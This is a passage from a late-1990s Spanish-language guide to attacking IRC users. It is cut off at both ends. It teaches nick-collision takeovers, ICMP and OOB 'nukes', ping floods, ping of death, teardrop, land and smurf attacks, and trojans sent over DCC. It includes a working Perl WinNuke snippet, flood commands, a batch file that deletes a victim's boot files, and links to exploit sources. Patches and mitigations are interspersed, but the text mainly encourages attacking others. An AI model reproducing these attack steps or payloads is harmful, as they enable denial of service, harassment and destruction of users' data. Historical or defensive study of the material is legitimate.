los mensajes de otros servidores. Esta tΘcnica es mßs efectiva que la anterior, pues funciona
en servidores con protecci≤n.
Los pasos serφan los siguientes:
- Meter un clone en el servidor lageado.
- Esperar a que la vφctima cambie de nick (esto lo detectamos desde otro servidor no lageado).
- Cambiar rßpidamente el nick de nuestro clone y ponerle el que se acaba de poner la vφctima
(el nuevo).
- Esperar al lag. ;)
Lo que ocurre es que nuestra orden de cambiar el nick para nuestro clone llega antes al
servidor (lageado) que la orden de cambio de nick de la vφctima debido a que nuestra orden
va directamente de nuestro cliente al servidor lageado mientras que la otra va a travΘs de
la red IRC (donde hemos supuesto que se introduce un lag notable). Esto hace que el servidor
(lageado) tome a nuestro clone como "due±o" legφtimo del nick y mande un kill al otro
(la vφctima). Esto ocurrirφa en caso de servidores protegidos; si es no protegido el resultado es que ambos mueren, resultado tambiΘn aceptable, pues hemos acabado con nuestro objetivo. };-)
3.3.- Nuke.-
"Nuke" es la denominaci≤n genΘrica que se le suele dar a cualquier forma de ataque consistente
en mandar paquetes arbitrarios a una determinada direcci≤n IP (no es que sea una definici≤n
demasiado ortodoxa pero bueno... :)). Realmente el tΘrmino "nuke" siempre se ha referido al
primero de los dos tipos que comentaremos, aunque aquφ se ha preferido tomar una definici≤n
mßs amplia de dicha palabra.
3.3.1.- ICMP nuke.-
El mßs veterano de los nukes [ :-) ] usa un protocolo subyacente de IP, el ICMP
("Internet Control Message Protocol": parte integral del protocolo de Internet [IP] que
resuelve errores y controla los mensajes), para romper una conexi≤n cliente-servidor de IRC
(tirar a alguien del server). Para entender c≤mo funciona hay que hablar un poco de
protocolos; es aburrido pero no hay mßs remedio...
Una conexi≤n IRC (cliente-servidor, que es lo que nos interesa) utiliza el protocolo TCP
(nivel 4 [transporte] en la torre OSI), el cual se apoya sobre IP (nivel 3 [red]). IP se
encarga, entre otras cosas, de hacer el rutado de paquetes ("datagramas IP"), es decir,
dado un destino ir enviando los paquetes por el camino apropiado hasta alcanzar el host
destino. TCP no ve nada de esto, tan s≤lo el destino directamente (manda los segmentos TCP
directamente al destino), porque IP lo oculta (hace que el rutado sea transparente a TCP).
L≤gicamente para que un protocolo de nivel superior funcione correctamente, tambiΘn deberßn
hacerlo todos los que estΘn por debajo. En particular, para que nuestra conexi≤n TCP (IRC)
se mantenga "viva", IP debe funcionar perfectamente. Y aquφ es donde interviene ICMP: se
encarga de informar de posibles anomalφas que se han producido en el nivel 3 (IP), como por
ejemplo, "host unreachable", que significarφa que no se ha podido alcanzar el host
(el paquete IP ha ido dando saltos ["hops"] de un nodo a otro, hacia el destino, y ha llegado
un momento en el que un determinado nodo intermedio no sabφa quΘ hacer con Θl o ha expirado
el tiempo de vida de dicho paquete). En este caso, el paquete que informa del error (ICMP) lo
envφa el nodo intermedio que se ha dado cuenta del error hacia el "remitente" que lanz≤ el
paquete original (que no se ha podido entregar a su destinatario). Los mensajes ICMP se situan
dentro del campo de datos de un datagrama IP y se envφan exactamente igual que si fueran datos
IP (no son prioritarios). No es objetivo de este escrito tratar mßs a fondo este tema
(para los interesados les aconsejo el libro "Internetworking with TCP/IP, vol I", de
Douglas E. Comer, disponible en castellano ya en su tercera edici≤n).
Resumiendo: mediante ICMP informamos de que IP ha fallado, y por tanto, tambiΘn los niveles
superiores como TCP.
Comprendiendo lo anterior ya se puede intuir en quΘ consiste el ICMP nuke: mandar mensajes
ICMP falseados, enga±ando al destino, haciΘndole creer que el otro extremo ha detectado un
error y por tanto, provocando un "cierre" de la comunicaci≤n. Vamos a explicar un poco mejor
Θsto.
En una conexi≤n siempre tenemos dos extremos, lo que da dos posibilidades a la hora de
enga±ar, seg·n lo hagamos a uno u otro. En el caso de una conexi≤n IRC, podemos llevar a
cabo dos formas de ataque:
* Server nuking (nukear al server): los mensajes ICMP se mandan al servidor IRC, haciΘndole
creer que se ha producido un error al intentar comunicarse con el cliente. Como respuesta a
este mensaje el server cierra la conexi≤n que tenφa con dicho cliente. El efecto producido
es la "expulsi≤n" del usuario por parte del servidor.
* Client nuking (nukear al cliente): esta vez se envφan los ICMP's al cliente; Θste cree que
el servidor no estß disponible y cierra la conexi≤n (el cliente). El servidor no sabe nada
en principio, pero detecta el cierre de conexi≤n por parte del cliente, dando el
correspondiente error y cerrando tambiΘn la conexi≤n por su parte.
En teorφa las dos fomas de nuking son perfectamente vßlidas y eficientes, aunque hay que
tener ciertas consideraciones en cuenta, como son:
- tanto servidor como cliente pueden tener protecci≤n anti-nuke y puede ser necesario atacar
uno porque el otro estΘ protegido (ver mßs adelante).
- si atacas a un cliente, Θste puede detectar quiΘn le estß atacando con un simple analizador
de paquetes IP o tracer, y tambiΘn podrφa responder con otro ataque de este o cualquier otro
tipo (cuidado con quiΘn te metes ;-)).
- si atacas al servidor, el cliente no tiene manera de saber quiΘn le ha "atacado" porque los
mensajes ICMP no le han llegado a Θl sino al servidor (ventaja); pero por otro lado, el
servidor sφ sabe quiΘn ha hecho el ataque y puede resultar en una K/G-Line a dicho usuario
por parte del servidor (el usuario podrφa ser baneado de toda la red de IRC).
- los inconvenientes de los dos puntos anteriores pueden ser solventados falseando la direcci≤n
origen de los mensajes ICMP que se envφan. Esta tΘcnica se conoce como "spoofing"
(ver punto 4).
Hay diversos tipos de error ICMP que se pueden utilizar a la hora de hacer un nuke. En cuanto
a la informaci≤n prßctica de c≤mo utilizar un nuker (programa "nukeador"), debemos tener en
cuenta que ademßs de suministrarle el tipo de error que se desea producir, juegan un papel
muy importante los puertos, tanto origen como destino, que se elijan.
Una conexi≤n IRC (TCP) queda definida unφvocamente por los pares direcci≤n IP origen-puerto
origen y direcci≤n IP destino-puerto destino. Estos datos son los que hay que suministrarles
al programa nukeador. Puertos tφpicos del servidor de IRC (serß el puerto destino en caso de
server nuking o el fuente si se trata de un client nuking) son 6665-9, 4400-6, 7000 y 7777.
En realidad cada servidor IRC tiene unos puertos oficialmente reconocidos
(que son conocidos p·blicamente: los podemos leer en el motd ["mensaje del dia"] al entrar
en el IRC) y otros que podrφamos denominar como privados, y que se usan por ejemplo para las
conexiones entre los distintos servidores que forman la red. Un usuario puede estar usando
uno de estos puertos "fantasmas" (aunque el servidor tambiΘn puede limitar el acceso a estos
puertos) para esconderse de nukes, puesto que necesitamos conocer este dato para que el nuke
sea efectivo.
TambiΘn necesitamos conocer el puerto del cliente, aunque esto es mßs difφcil porque varφa
mucho (no son fijos como en el caso anterior) dependiendo del sistema operativo que estΘ
corriendo dicho cliente, los puertos que ya tuviera ocupados antes de establecer la conexi≤n
IRC, Θtc. Lo normal es hacer un barrido de estos puertos empezando por el 1024
(hay puertos que por convenio siempre se asignan a determinadas tareas y no se pueden usar
arbitrariamente con lo cual no necesitamos barrerlos) y acabando en 4000, por ejemplo,
aunque podrφa ser necesario aumentar este n·mero.
Es tambiΘn muy ·til utilizar un "port-scan": programa que va probando los distintos puertos
de una direcci≤n IP (destino) dada e informa de la respuesta recibida para cada uno de dichos
puertos (asφ podemos saber, por ejemplo, quΘ puertos de un servidor estßn dedicados a aceptar
conexiones IRC).
A continuaci≤n transcribo mensajes tφpicos de salida de nuestras potenciales vφctimas en una
sesi≤n tφpica de IRC:
[1:42] *** aRmiTaGe has quit IRC (Read error to aRmiTaGe[ig-183.arrakis.es]: Connection reset
by peer)
[1:13] *** KoNtRoL has quit IRC (Read error to KoNtRoL[195.76.99.76]: EOF from client)
[3:17] *** BrOKeNn has quit IRC (Read error to BrOKeNn[194.224.57.171]: Protocol not available)
[5:25] *** Eli has quit IRC (Read error to Eli[info760.jet.es]: Network is unreachable)
[5:26] *** Eli has quit IRC (Read error to Eli[info760.jet.es]: Machine is not on the network)
[4:20] *** vp has quit IRC (Read error to vp[ia-176.arrakis.es]: Connection refused)
[2:41] *** Estrayk has quit IRC (Read error to Estrayk[ctv3011.ctv.es]: No route to host)
La protecci≤n anti-nuke, a grosso modo, pasa por ignorar los mensajes ICMP que lleguen, aunque
Θsto ya estß limitando el propio funcionamiento del protocolo IP, en el sentido de que ICMP
es parte integrante de IP y no se deberφa inhibir (┐quΘ ocurrirφa si llega un mensaje
"de verdad" y es ignorado?). Se puede llevar a cabo mßs o menos "finamente": por ejemplo
descartar solo los ICMP's de un tipo y no todos los posibles. Se podrφa lograr con un firewall
(software o hardware encargado de filtrar los paquetes provinientes de la red en base a una
reglas previamente definidas) convenientemente configurado.
Puedes echar un vistazo al listado fuente de un programa en C para mandar ICMP nuke's:
puke.c <ircutils/puke.html>
3.3.2.- OOB nuke.-
TambiΘn conocido como 'winnuke', ya que afecta s≤lo al sistema operativo Windows, en
cualquiera de sus "sabores": 3.x, 95 y NT. Se basa en un bug que tiene este SO en la pila de
protocolos por el cual el sistema se cuelga ("error de protecci≤n general...blah, blah...")
cuando recibe un paquete con el flag OOB ("Out of band") activado. El ataque es sencillo:
mandar un paquete de este tipo a un puerto (normalmente el 139) de nuestrß vφctima
(Θsta debe estar corriendo Windows, lo cual es muy normal hoy en dφa). Existen programas ya
hechos a los cuales simplemente le das la direcci≤n IP de la vφctima y el programa lo hace
todo.
La forma de protegerse es cerrar los puertos por los que nos puedan atacar
(el 139 principalmente) o aplicar alg·n parche al SO para quitarnos el bug. Otra soluci≤n
menos recomendable es la que llevan a cabo algunos ISPs (proveedores de Internet), y que
consiste en filtrar todos los paquetes dirigidos al puerto 139 (inconveniente: nos estßn
dejando inoperativo ese puerto). Hoy en dφa es muy popular este bug y normalmente estß
ampliamente parcheado (aunque siempre habrß alg·n que otro despistado que no lo tenga
instalado }=)).
Como hemos dicho, este ataque no s≤lo consigue echar a la vφctima del server sino que ademßs
le deja colgado el ordenador (tendrß que hacer un reboot), lo que lo hace especialmente
peligroso. La vφctima saldrß del IRC con un mensaje de tipo ping-timeout como:
[19:56] *** Goku has quit IRC (Ping timeout for Goku[system.tech.arrakis.es])
Aquφ teneis una curiosa muestra en PERL de c≤mo implementar el ataque (autor: Randal Schwartz):
#!/usr/bin/perl
use IO::Socket;
IO::Socket::INET
->new(PeerAddr=>"bad.dude.com:139")
->send("bye", MSG_OOB);
Y por ·ltimo, el programa definitivo en C, que tiene la ventaja de que spoofea la direcci≤n
origen:
winbomber.c <ircutils/winbomber.html>
* Puedes encontrar informaci≤n oficial sobre el bug y links a los parches correspondientes
(Win95 y NT) en:
http://premium.microsoft.com/support/kb/articles/q168/7/47.asp
3.4.- Ping.-
Algunos los llama tambiΘn "IP bombs" (bombas IP). Un ping es un tipo de mensaje ICMP que se
usa para ver si una mßquina se encuentra operativa y accesible. El procedimiento es enviarle
un ping a la mßquina; Θsta lo recibe y contesta. Al recibir la contestaci≤n ya sabemos que la
mßquina vive. Si no se recibe en un plazo dado se considera como no accesible
(la mßquina podrφa estar apagada, o todos los "caminos" en la red hacia ella cortados). Ademßs
podemos obtener mßs datos como el grado de saturaci≤n de una mßquina o red (midiendo el tiempo
de respuesta de la mßquina, es decir, el tiempo transcurrido desde que una mßquina origen
envφa el ping hasta que recibe la contestaci≤n de la otra).
La manera de usar esto de forma ofensiva consiste en mandar mßs pings a un usuario de los que
su mßquina pueda contestar, saturßndole su conexi≤n a Internet. Por tanto se debe de hacer
desde un enlace mßs potente que el que pretendemos atacar.
Lo tφpico es que la vφctima estΘ en su casa y tenga un modem. Por tanto, necesitamos una
conexi≤n a inet mßs rßpida que eso. Lo normal es atacar desde una mßquina ubicada ya en la red
(conectada mediante ATM, FDDI, ...). Por ejemplo, puede valer la cuenta de la Universidad ;-).
La forma de hacerlo serφa abriΘndonos un shell y tecleando:
$ ping -s 32000 <direcc. IP>
(la sintaxis puede variar ligeramente seg·n sistema operativo).
Los paquetes que se envφan al hacer ping son tφpicamente muy peque±os. Con el modificador -s
estamos forzando un nuevo tama±o (32000 bytes es aceptable; tambiΘn podeis probar con 64000).
Pensad: un modem de 28.8 tardarß unos 18 segs. en recibir 64 Kbytes (sin considerar compresi≤n),
mientras que desde nuestra shell lo hemos mandado en íídΘcimas de segundo!! Si consideramos
ademßs que el comando ping manda mßs de un paquete (los que queramos) ... íboom! TendrΘis el
modem de vuestra vφctima trabajando a toda pastilla para nada y fastidißndole todo lo que estΘ
haciendo. En particular, le estropearΘis su conexi≤n al IRC: en el mejor de los casos la
vφctima tendrß un lag horroroso y en el peor serß expulsada del servidor por "ping time-out".
Desgraciadamente la soluci≤n para evitar este ataque no suele ser fßcil ya que no se trata de
un bug que se pueda parchear sino de la propia mecßnica de los protocolos TCP/IP. Aconsejo
usar un bouncer localizado en una mßquina potente capaz de absorber el ataque.
3.4.1.- Ping of death.-
Este viejo ataque afecta a kernels muy antiguos (Linux 2.0.7 y 2.1.1, SunOS y HPUX antiguos,
Θtc) y consigue "congelarlos" en el acto o provocar un "reboot". Consiste en mandar a la
vφctima paquetes ICMP (de "ping", vulgarmente hablando) de un tama±o mayor al permitido por el
kernel de la vφctima. L≤gicamente el ataque no se puede realizar desde una mßquina de
caracterφsticas similares a la vφctima, por razones obvias. Sin embargo, sφ se conseguφa
llevar a cabo desde una mßquina Win95 ≤ WinNT, ya que Θstas soportaban el tama±o de paquete
requerido. El comando a usar desde estos SO's era:
> ping -l 65510 host.victima
N≤tese que este comando se refiere exclusivamente a Windows antiguos. Asφ, por ejemplo, no
funciona en NT 4.0 (da como error "valor incorrecto para la opci≤n -l" ya que el mßximo ping
que puede lanzar es de longitud 65500), pero sφ en versiones mßs antiguas y sin parchear.
TambiΘn se puede lanzar desde Unix'es no demasiado antiguos.
Para los antiguos sali≤ una versi≤n que emulaba el referido ping:
simping.c <ircutils/simping.html>
Hoy en dφa este ataque estß ampliamente superado y he decidido incluirlo en el documento por
"razones hist≤ricas" :-). Aunque todavφa es posible encontrar mßquinas muy antiguas
vulnerables a este ataque.
TambiΘn es posible en la actualidad atacar alg·n Windows desde un Linux, p.ej.
3.5.- Ssping.-
Nos encontramos ante otro bug parecido al del OOB, que afecta a Win95 y NT (
aunque no a todas las configuraciones), y cuya idea es que el "maravilloso" Windows "se lφa"
a la hora de reconstruir paquetes que le han llegado fragmentados y acaba con un cuelgue del
ordenador. El ataque consiste en precisamente mandar esos paquetes fragmentados a la vφctima.
Un bug de este tipo es viejo conocido de los sistemas UNIX (el ataque se conocφa como
"ping of death"); pero la novedad es que ahora lo sufren los Windows. Aunque son cosas
tΘcnicamente diferentes, la forma de proceder a la hora de atacar es anßloga a OOB: solo hay que saber la direcci≤n IP de la vφctima y íboom!: le dejamos colgado el ordenador.
La soluci≤n pasa por parchear el S.O. En particular, este bug parece que no afecta al
Trumpet Winsock asφ que si lo usais estareis protegidos.
3.6.- Teardrop.-
Este ataque nos recuerda al "ssping" ya que tambiΘn estß basado en un error al reensamblar
paquetes fragmentados que le han llegado a la vφctima. Esta vez la pila TCP/IP se lφa al
intentar ensamblar paquetes fragmentados que se solapan entre sφ
(es decir, hay regiones de "datos" comunes en dos paquetes distintos) provocando el cuelgue
del ordenador. A diferencia de "ssping" y "OOB" este bug afecta a multitud de S.O.'s,
incluφdos Linux, Win95 y NT.
* La soluci≤n a este bug pasa por parchear o actualizar nuestro S.O, a saber:
- Linux: actualizar el kernel a 2.0.32 o superior.
- Windows 95 y NT: informaci≤n y parches disponibles en:
http://premium.microsoft.com/support/kb/articles/q154/1/74.asp
ftp://ftp.microsoft.com/bussys/winnt/kb/Q154/1/74.TXT
http://premium.microsoft.com/support/kb/articles/q174/0/95.asp
Me parece que en Windows 95 basta con los siguientes parches (pero no os fieis demasiado, no
los he probado):
http://support.microsoft.com/download/support/mslfiles/Vtcpupd.exe
http://support.microsoft.com/download/support/mslfiles/Vipup11.exe (para Winsock 1.1)
http://support.microsoft.com/download/support/mslfiles/Vipup20.exe (para Winsock 2)
(se recomienda hacer un backup de los ficheros vip.386, vtcp.386 y vnbt.386 antes de aplicar l
os parches, por lo que pudiera pasar).
3.7.- Land.-
Consiste en mandar a un host y puerto especificado (vφctima) un paquete spoofeado con el bit
syn (petici≤n de conexi≤n) activo y con direcci≤n y puerto fuente los mismos a los cuales va
dirigido el paquete (i.e. direcci≤n y puerto de la vφctima). Resumiendo, hacemos como si la
mßquina vφctima quisiera realizar una conexi≤n a ella misma. Esto provoca el cuelgue de la
mßquina vφctima en la mayorφa de los casos o en otros que la carga de la CPU alcance valores
insospechados.
Este bug afecta a una gran variedad de sistemas (routers incluφdos). Una lista bastante
completa (pero nunca al 100%) de sistemas afectados es la siguiente:
AIX 3 IS vulnerable
AIX 3.2 NOT vulnerable
AIX 4 NOT vulnerable
AIX 4.1 NOT vulnerable
AIX 4.2.1 NOT vulnerable
AmigaOS AmiTCP 4.0demo NOT vulnerable
AmigaOS AmiTCP 4.2 (Kickstart 3.0) IS vulnerable
AmigaOS Miami 2.0 NOT vulnerable
AmigaOS Miami 2.1f NOT vulnerable
AmigaOS Miami 2.1p NOT vulnerable
AmigaOS Miami 2.92c NOT vulnerable
BeOS Preview Release 2 PowerMac IS vulnerable
BSDI 2.0 IS vulnerable
BSDI 2.1 (vanilla) IS vulnerable
BSDI 2.1 (K210-021,K210-022,K210-024) NOT vulnerable
BSDI 3.0 NOT vulnerable
DG/UX R4.12 NOT vulnerable
Digital UNIX 3.2c NOT vulnerable
Digital UNIX 4.0 NOT vulnerable
Digital VMS ??? IS vulnerable
FreeBSD 2.1.6-RELEASE NOT vulnerable
FreeBSD 2.2.2-RELEASE NOT vulnerable
FreeBSD 2.2.5-RELEASE IS vulnerable
FreeBSD 2.2.5-STABLE IS vulnerable (fixed)
FreeBSD 3.0-CURRENT IS vulnerable (fixed)
HP External JetDirect Print Servers IS vulnerable
HP-UX 9.03 NOT vulnerable
HP-UX 10.01 NOT vulnerable
HP-UX 10.20 NOT vulnerable
IBM AS/400 OS7400 3.7 IS vulnerable (100% CPU)
IRIX 5.2 IS vulnerable
IRIX 5.3 IS vulnerable
IRIX 6.2 NOT vulnerable
IRIX 6.3 NOT vulnerable
IRIX 6.4 NOT vulnerable
Linux 1.2.13 NOT vulnerable
Linux 2.1.65 NOT vulnerable
Linux 2.0.30 NOT vulnerable
Linux 2.0.32 NOT vulnerable
MacOS MacTCP IS vulnerable
MacOS OpenTransport 1.1.1 NOT vulnerable
MacOS 7.1p6 NOT vulnerable
MacOS 7.5.1 NOT vulnerable
MacOS 7.6.1 OpenTransport 1.1.2 IS vulnerable (not a compleate lockup)
MacOS 8.0 IS vulnerable (TCP/IP stack crashed)
MVS OS390 1.3 NOT vulnerable
NetApp NFS server 4.1d IS vulnerable
NetApp NFS server 4.3 IS vulnerable
NetBSD 1.1 IS vulnerable
NetBSD 1.2 IS vulnerable
NetBSD 1.2a IS vulnerable
NetBSD 1.2.1 IS vulnerable (fixed)
NetBSD 1.3_ALPHA IS vulnerable (fixed)
NeXTSTEP 3.0 IS vulnerable
NeXTSTEp 3.1 IS vulnerable
Novell 4.11 IS vulnerable (100% CPU for 30 secs)
OpenBSD 2.1 (conflicting reports)
OpenBSD 2.2 NOT vulnerable
OpenVMS 7.1 with UCX 4.1-7 IS vulnerable
OS/2 3.0 NOT vulnerable
OS/2 4.0 NOT vulnerable
QNX 4.24 IS vulnerable
Rhapsody Developer Release IS vulnerable
SCO OpenServer 5.0.2 SMP IS vulnerable
SCO OpenServer 5.0.4 IS vulnerable (kills networking)
SCO Unixware 2.1.1 IS vulnerable
SCO Unixware 2.1.2 IS vulnerable
Salaris 2.4 NOT vulnerable
Solaris 2.5.1 NOT vulnerable
Solaris 2.5.2 NOT vulnerable
Solaris 2.6 NOT vulnerable
SunOS 4.1.3 IS vulnerable
SunOS 4.1.4 IS vulnerable
Ultrix ??? NOT vulnerable
Windows 95 (vanilla) IS vulnerable
Windows 95 + Winsock 2 + VIPUPD.EXE IS vulnerable
Windows NT (vanilla) IS vulnerable
Windows NT + SP3 IS vulnerable
Windows NT + SP3 + simptcp-fix IS vulnerable
Some misc stuff:
3Com Accessbuilder 600/700 NOT vulnerable
3Com LinkSwitch 1000 NOT vulnerable
3Com OfficeConnect 500 NOT vulnerable
3Com SuperStack II Switch 1000 IS vulnerable
Adtran TSU Rack NOT vulnerable
Apple LaserWriter IS vulnerable
Ascend 4000 5.0Ap20 NOT vulnerable
Ascend Pipeline 50 rev 5.0Ai16 NOT vulnerable
Ascend Pipeline 50 rev 5.0Ap13 NOT vulnerable
BayNetworks MARLIN 1000 OS (0).3.024(R) NOT vulnerable
BinTec BIANCA/BRICK-XS 4.6.1 router IS vulnerable
Cisco Classic IOS < 10.3, early 10.3, 11.0, 11.1, and 11.2 IS vulnerable
Cisco IOS/700 IS vulnerable
Cisco Catalyst IS vulnerable
Digital VT1200 IS vulnerable
Farallon Netopia PN440 NOT vulnerable
HP Envizex Terminal IS vulnerable
LaserJet Printer NOT vulnerable
Livingston Office Router (ISDN) IS vulnerable
Livingston PM ComOS 3.3.3 NOT vulnerable
Livingston PM ComOS 3.5b17 + 3.7.2 NOT vulnerable
Livingston PM ComOS 3.7L NOT vulnerable
Livingston PM ComOS 3.7.2 NOT vulnerable
Livingston Enterprise PM 3.4 2L NOT vulnerable
Livingston T1/E1 OR IS vulnerable
Milkyway Blackhole Firewall 3.0 (SunOS) IS vulnerable
Milkyway Blackhole Firewall 3.02(SunOS) IS vulnerable
NCD X Terminals, NCDWare v3.1.0 IS vulnerable
NCD X Terminals, NCDWare v3.2.1 IS vulnerable
Netopia PN440 v2.0.1 IS vulnerable
Proteon GT60 NOT vulnerable
Proteon GT60Secure NOT vulnerable
Proteon GT70 NOT vulnerable
Proteon GT70Secure NOT vulnerable
Proteon GTAM NOT vulnerable
Proteon GTX250 NOT vulnerable
Proteon RBX250 NOT vulnerable
Sonix Arpeggio NOT vulnerable
Sonix Arpeggio + NOT vulnerable
Sonix Arpeggio Lite NOT vulnerable
Podeis comprobar la efectividad del ataque usando:
land.c <ircutils/land.html>
* Informaci≤n y parches para NT:
ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/hotfixes-postSP3/land-fix/
Q165005.txt
* Informaci≤n y parches para Win95:
ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/hotfixes-postSP3/land-fix/
Q177539.TXT
3.8.- Teardrop modificado.-
Nos encontramos ante una variante del temido teardrop. Esta vez lo que se hace es mandar
paquetes UDP fragmentados a puertos aleatorios de la mßquina vφctima. La peculiaridad es que
esta vulnerabilidad sigue existiendo en mßquinas Windows íya parcheadas contra teardrop!
* Como siempre, para evitar este ataque tenemos que aplicar los correspondientes parches:
ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/hotfixes-postSP3/
teardrop2-fix/
3.9.- Smurf.-
Consiste en mandar paquetes ICMP de "echo request" (como los de un ping) con una falsa
direcci≤n de origen (la IP de la vφctima) a una direcci≤n de difusi≤n ("broadcast"). De
esta forma alcanzarßn muchas mßquinas, cada una de las cuales enviarß sus paquetes de
respuesta a la direcci≤n origen de la petici≤n (cuyos datos estaban falseados y apuntaban a la
vφctima). El resultado es que la mßquina vφctima se ve inundada de paquetes IP, resultando en
una saturaci≤n de su enlace (algo asφ como si le hubieran hecho un ping a lo grande).
Desgraciadamente la vφctima no puede hacer nada para evitarlo. La soluci≤n estß en manos de
los administradores de red, los cuales deben configurar adecuadamente sus routers para filtrar
los paquetes ICMP de petici≤n indeseados (broadcast) o bien configurar sus mßquinas para que
no respondan a dichos paquetes. Es decir, que lo que se parchea son las mßquinas/redes que
puedan actuar de intermediarias (inocentes) en el ataque y no la mßquina vφctima.
De igual forma tambiΘn se podrφa evitar el ataque si el router/firewall de salida del atacante
(p.ej. el ISP al que pertenece) estuviera convenientemente configurado para evitar spoofing.
Esto se harφa filtrando todos los paquetes de salida que tuvieran una direcci≤n source
(origen) que no perteneciera a la red interna (desde la cual salimos).
Para mßs informaci≤n sobre "smurf" os remito a:
~
http://www.quadrunner.com/~c-huegen/smurf.txt
3.10.- Bonk (/Boink).-
La mecßnica de este ataque es parecida a la del Teardrop. De hecho, se puede hablar de
Teardrop a la inversa. Esta vez lo que se fuerza es a que el offset del fragmento sea mayor
que la longitud de la cabecera. El intento de reensamblaje por parte de la vφctima conlleva el
cuelgue del ordenador. Afecta a Win95 (y quizßs NT) incluso una vez parcheado contra Teardrop2.
3.11.- Syndrop.-
Tal y como reza el comentario del siguiente source este bug es una mezcla de otros dos:
el basado en secuencias con el flag SYN y el Teardrop. Es decir, es una variante mßs del
Teardrop.
3.12.- Overdrop.-
Afecta al kernel 2.0.33 de Linux y es mßs que nada molesto.
Consiste en mandar paquetes incorrectos de forma que el kernel vφctima produzca los
correspondientes mensajes de error, que normalmente son logeados en fichero.
Se consigue pues llenar el disco duro o la consola de la vφctima con mensajes de este tipo.
3.13.- Nestea (/Nestea2).-
Se trata de una nueva variante del Teardrop.
3.14.- Trojans.-
Un "troyano" (o "trojan", en inglΘs) es un programa que "cuelan" en tu ordenador y que tiene
otras funciones (normalmente perniciosas) en vez de o ademßs de las funciones normales
(para lo que se supone que sirve el programa). En este sentido, es anßlogo a un virus,
solo que no se extiende por sφ s≤lo (normalmente): hay que introducirlo "manualmente" a la
vφctima y forzarla o convencerla para que lo ejecute.
En el caso del IRC lo que se hace usualmente es mandßrselo a la vφctima vφa DCC. Cuando Θsta
ejecuta el programa se ve infectada o le ocurre algo pernicioso }:-).
Para que se entienda el concepto: imaginad que yo creo un fichero llamado "sorpresa.bat"
con lo siguiente:
@echo off
del c:\autoexec.bat
del c:\config.sys
echo Sorpresa...
Ahora se lo envφo a alguien y Θste lo ejecuta. Entonces se le borrarφan los ficheros de
arranque };-)
Esto que se ve tan simple se puede implementar de forma mucho mßs elaborada creando un
exe de forma que en principio no podemos saber lo que hace el programa internamente hasta
que lo ejecutamos.
Soluci≤n: como normal general no acepteis ficheros ejecutables de extra±os, o por lo menos,
no los ejecuteis. Si os van a pasar alg·n programa extra±o es aconsejable que os pasen el
source para que se le pueda echar un vistazo al programa, asegurarnos de que no hace
"cosas raras" y entonces compilarlo nosotros mismos. Esto ·ltimo es lo mßs seguro.
3.14.1.- Mirc.ini.-
Se trata del fichero de configuracion principal del cliente mIRC. Es muy potente porque
permite scripting, o sea, crearte tus propios comandos a medida y automatizar tareas.
Algunos graciosos se dedican a pasar por DCC una versi≤n "modificada" (troyana) que circula
por ahφ y que entre otras cosas a±ade ciertos comandos para que remotamente un intruso pueda
hacerte cosas en tu ordenador. S≤lo funcionarß si se consigue que el archivo troyano reemplace
al archivo mirc.ini original, lo cual tampoco es fßcil ya que tendrφamos que tener configurado
nuestro mIRC para que la zona de download apunte al directorio "raiz" de mIRC (de forma que el
fichero recibido por DCC vaya al directorio donde se encuentran los ejecutables y ficheros de
configuraci≤n de mIRC) y ademßs aceptar el DCC (o tener activada la opci≤n de "auto-get", o
sea, de aceptar automßticamente los DCC's, cosa que no aconsejo en absoluto).
Soluci≤n: no uses el "auto-get" ni aceptes ficheros de extra±os o que no sepas bien lo que
hacen.
3.14.2.- Dmsetup.exe.-
Este es un troyano que ·ltimamente ha circulado bastante y que no se realmente lo que hace
porque no me he molestado en mirarlo (ni pienso hacerlo). Pero por lo que tengo entendido
en concepto es algo similar al mirc.ini, o sea, permite acceso remoto a un intruso.
Para buscar gente infectada creo que puedes escribir en el canal ".x." (o algo asφ) y
los afectados por el troyano te responderßn vφa MSG de forma automßtica.
3.14.3.- Back Orifice.-
TambiΘn conocida como "BO", por sus iniciales, es una herramienta escrita por el grupo
"Cult of the Dead Cow" que permite la administraci≤n remota de una mßquina con
Windows 95 / 98. Respetando el tradicional esquema cliente / servidor, el programa servidor
es instalado en la mßquina a administrar y el cliente desde otra mßquina puede enviar comandos
al servidor de forma que se obtiene un control total sobre la primera mßquina: podemos
ejecutar comandos, listar ficheros, arrancar servicios de forma transparente, compartir
directorios, subir y bajar ficheros, manipular el registro, matar o listar procesos, Θtc.
La pßgina oficial del BO es:
http://www.cultdeadcow.com
El problema viene cuando un atacante se las ingenia para que una posible vφctima instale el
software servidor en su mßquina, sin darse cuenta, al mßs puro estilo troyano. Esto es posible
si por ejemplo el atacante le envφa a la vφctima el programa 'boserver.exe" renombrado a
digamos "antinuke.exe", y Θsta, inocentemente, lo ejecuta creyendo que se trata del ·ltimo y
fabuloso programa anti-nuke ;-). A partir de ese momento, el ordenador de la vφctima se
encuentra "infectado" con lo que tΘcnicamente se denomina un "back-door" ("puerta trasera"),
y el atacante o cualquiera que tenga el cliente de BO (y que sepa o adivine ciertos datos
acerca de la configuraci≤n del servidor) podrß acceder al ordenador de la vφctima. Se trata
de un grave problema de seguridad.
Cuando ejecutamos el programa servidor, se instala el back-door, siguiendo los siguientes
pasos:
- se copia el programa servidor en el directorio de sistema de Windows
(normalmente "c:\windows\system") con el nombre especificado por el usuario (/atacante).
- se crea una entrada de registro en
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices"
apuntando al nombre de fichero del servidor referido anteriormente y con una descripci≤n
de "(Default)" o bien la que haya especificado el usuario (/atacante).
- el servidor comenzarß a escuchar el puerto 31337 UDP o el especificado por el usuario
(/atacante), atendiendo a las peticiones del cliente (/atacante). El protocolo usado utiliza
una dΘbil encriptaci≤n, fßcil de romper.
* C≤mo detectarlo: accedemos a la entrada del registro arriba nombrada, usando 'regedit.exe',
y buscamos un servicio que no hayamos instalado nosotros. Si el fichero al que apunta es
de una longitud aproximada de 124,928 bytes, entonces es posible que se trate de BO.
Otra forma es usar el comando "netstat":
C:\WINDOWS>netstat -an | find "UDP"
UDP 0.0.0.0:31337 *:*
* C≤mo eliminarlo: simplemente tenemos que borrar tanto el programa servidor del directorio de
sistema de Windows como la entrada del registro que apunta hacia Θl (anteriormente mencionada).
Teneis instrucciones aquφ:
http://www.nwi.net/~pchelp/bo/bo.html
* TambiΘn existen diversos programas que detectan y/o eliminan el BO, aunque hay que tener
